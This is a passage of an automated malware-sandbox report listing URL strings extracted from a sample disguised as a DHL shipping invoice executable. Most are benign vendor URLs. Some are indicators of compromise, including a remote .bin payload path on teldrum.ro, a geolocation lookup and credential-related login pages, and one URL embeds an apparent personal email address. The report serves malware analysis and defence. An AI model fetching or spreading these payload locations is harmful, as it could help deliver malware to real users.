              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423702210512.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423629557045.0000000002DE8000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, bhv3B50.tmp.5.drString found in binary or memory: http://geoplugin.net/json.gp
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp-
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpy
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://i.pki.goog/r1.crt0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://i.pki.goog/wr2.crt0
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Surra.bat.4.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://o.pki.goog/wr20%
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0Q
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://ocsp.pki.goog/gsr10)
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000003.423682945889.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000003.423683050458.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683440754.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000003.423682945889.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000003.423683050458.0000000000C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423808236953.0000000034620000.00000040.10000000.00040000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423808236953.0000000034620000.00000040.10000000.00040000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000002.423701636580.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://account.live.com/
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://account.live.com/Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_HFeToeM4u6fzMQF_f_rQ5Q
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_white_ufRYlllWOw4YyDRi
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://account.live.com/Resources/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://account.live.com/Resources/images/Microsoft_Logotype_Gray_X-qkgtg8KmnQEvm_9mDTcw2.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://account.live.com/Resources/images/Microsoft_Logotype_White_4MYDQRab31HKDWWN-1HafA2.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://account.live.com/Resources/images/favicon.ico
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://account.live.com/Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://account.live.com/identity/confirm?mkt=EN-US&uiflavor=win10host&client_id=1E0000480728C5&conn
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/accountcorepackage_i2RIx9pJQzxuvCYvcsBhDw2.js?v=1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/bootstrapcomponentshim_yGKy8jAx8RL2bLqmBF063w2.js?v=1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/bootstrapshim_IX6xrWCoGcREOsbbsQ1Yvg2.js?v=1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/confirmidentity_VMvYfHIi1H4dC5BbwhdrSg2.js?v=1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/confirmidentity_tijX8CZgI3oGihpUAIhEcA2.js?v=1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/converged_ux_v2_nBE5FSqn9KpH44ZlTc3VqQ2.css?v=1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/corewin10_Lmno_4TyJLm7Xee3gF3aOg2.js?v=1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/hostfooterpackage_FOuGbot8yZGKyYkh5yNQBA2.js?v=1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://acctcdn.msftauth.net/wlivepackagefull_stPwvW3-5mShoxrbkAw2qw2.js?v=1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QWthbWFp
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons-wc/icons/entertainment/Watch.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/eventbrief.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/currency/svg/light2/greenup.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/index/svg/light/reddown.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/stock/svg/light/greenup.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/stock/svg/light/reddown.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/news/News.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Condition/AAehyQC.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Condition/D200PartlySunnyV2.sv
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Condition/MostlyCloudyNight.sv
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition_Badge/AAehR3S.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition_Badge/MostlyClearNig
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/AQI/uspl04.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition_Badge/AAehwh2.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition_Badge/MostlyClearNig
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition_Badge/MostlyCloudyDa
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/cold.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/recordlow.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/snowstart0.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/tempdrop1.svg
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://clientconfig.microsoftonline-p.net
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://dl.google.com/update2/installers/icons/%7B8a69d345-d564-463c-aff1-a69d9e530f96%7D.bmp?lang=e
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-CO1r5b&Fr
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-CO1r5d&Fr
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-STBr4a&Fr
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-TEB31r4a&
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?a5a64e0c54ac68d2bb3fe279ba481b43
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?ba409a8f64eabee8d74abf097d8ac157
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?3051799c973d67e861aaecd7556a6ca3
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?c20e7f18a6ae1c64cc31182bd0c35756
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?f0643352f6b9418c01d4e5c1bfa0fc35
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?fad69b40808a5c361d5212412316e452
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp-afd.azureedge.us/apc/trans.gif?4fea1fdc99823c92451a17d8ca82569e
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp-afd.azureedge.us/apc/trans.gif?dd18271340d9f89e1196520d4696d927
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?36ffcdee22400620cfe76eef8f1ff957
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?bc78fdcc80638dbee1d8c7d28004a4a8
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?6e8e16f9403e11eb3d41e544d821d20c
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?892ac4d726bcb34a7eb3674f31f4d6ee
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://lgincdnvzeuno.azureedge.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://login.live.com/
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000003.423694729496.0000000002931000.00000004.00000020.00020000.00000000.sdmp, bhv3B50.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604&scid=1&mkt=en-US&Platform=Windows10&clienti
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?route=C545_SN1&uaid=43f81c4022434c88b2d29ef87c0e50fa
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://login.live.com/ppsecure/post.srf?mkt=en-US&platform=Windows10&id=80604&clientid=000000004807
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/16.000/Converged_v21033_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/16.000/content/js/ConvergedFinishStrings.en_a-i4DjCYOmIyz-skr6COhA2.js
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_kBzKFDC4bzZ-s_mTe2
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_w2ql6jjxIAj3_FOY9W
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/16.000/content/js/WinJS_vcvx4TydCFioSeM4NLxTDw2.js
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/shared/1.0/content/images/arrow_left_43280e0ba671a1d8b5e34f1931c4fe4b.
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b3
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/shared/1.0/content/js/Win10HostFinish_PCore_rbYp2kZLfQs05CPUNZ-3yA2.js
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/shared/1.0/content/js/Win10HostLogin_PCore_KgN8HOiYy7zH7lAsyohyug2.js
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/shared/1.0/content/js/asyncchunk/win10hostlogin_ppassword_e56656570867
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://logincdn.msftauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://odc.officeapps.live.com/odc/jsonstrings?g=EmailHrdv2&mkt=1033&hm=1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/CommonDiagnostics.js?b=18012.30550
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.css?b=18012.30550
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.min.js?b=18012.30550
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=18012.30550
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/hrd/picker-account-aad.png?b=18012.30550
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/hrd/picker-account-msa.png?b=18012.30550
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/jquery-1.12.4.1.min.js?b=18012.30550
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/knockout-3.4.2.js?b=18012.30550
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1724250468116
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1724250614167
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp?hm=1&emailAddress=shahak.shapira%40outlook.com&_=172425
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=46279a3cb69087542051
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://outlookmobile-office365-tas.msedge.net/ab?clientId=17B579DB-801A-46C8-AAC3-7BEAA0565029
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://static-ecst.licdn.com/apc/trans.gif?0e5a548b0a720c79b169af9d741a7fdb
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://static-ecst.licdn.com/apc/trans.gif?7c2b66702d00db296676f8f31b5aac19
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://static-ecst.licdn.com/apc/trans.gif?a02ba91a859405ae0b0c01140868db41
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://static-ecst.licdn.com/apc/trans.gif?ccead4b800eb293b757b70fc8c8ceef9
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring-fallback-s2.msedge.net/apc/trans.gif?3c9a0b2e2e4e889b25ff29670d527d1b
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring-fallback-s2.msedge.net/apc/trans.gif?99a78f526834d20ac118fb2598a4998a
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring-s.msedge.net/apc/trans.gif?17c476fa0f8c4755ecd62f31e20bdb75
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring-s.msedge.net/apc/trans.gif?52b8bd16947046c4bbfd3bd123051dc2
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring-s.msedge.net/apc/trans.gif?e8838e761b8b519fe17cf2ef88856e26
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring-s.msedge.net/apc/trans.gif?eaef7c0c2ab73448f74981bc528769c7
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?1b33ddea1c52d7b46eb4da515e2a9537
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?30edb86ea8d17e9467d5496f348fbdf1
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?41f123490079fd68e7eef91b4fe37fdc
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?425e1ba47e59c53ae9d6db7cbf64606a
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?4a55c599e2c7ed894e147262287ea431
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?5c81679fc683e717883459c5c84863c8
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?7b20857c7368903a2d0586e2dd95164f
              Source: bhv3B50.tmp.5.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?c9fbd86504db8b03b72d92489b00f719
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/9
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423806513310.0000000032CF0000.00000004.00001000.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/pefNPfIwXuOzWmfkZMUhyE10.bin
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/pefNPfIwXuOzWmfkZMUhyE10.bin;
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423806513310.0000000032CF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/pefNPfIwXuOzWmfkZMUhyE10.binillssUndcrestereamuschilor.ro/pefNPfIwXuOzWmfkZMUhyE1
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
